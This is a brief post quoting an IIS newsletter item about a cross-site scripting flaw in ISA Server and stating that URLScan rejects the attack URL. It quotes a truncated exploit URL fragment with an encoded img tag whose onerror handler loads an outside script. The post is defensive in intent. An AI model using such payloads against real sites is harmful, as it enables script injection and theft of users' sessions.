Here is a quote from an IIS newsletter I receive <5> Cross scripting attack with ISA server easily defeated with URLScan I want to point out a newly announced cross scripting attack that affects ISA server. See http://www.pivx.com/larholm/adv/TL006/ for details. Notice that URL to implement the exploit is something like "http:// <img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2f This is a serious vulnerability, but if URLScan is installed on the ISA server, in most configurations, this URL would be rejected instead of processed. Once again, URLScan proves itself as a strong defender of future, unknown attacks.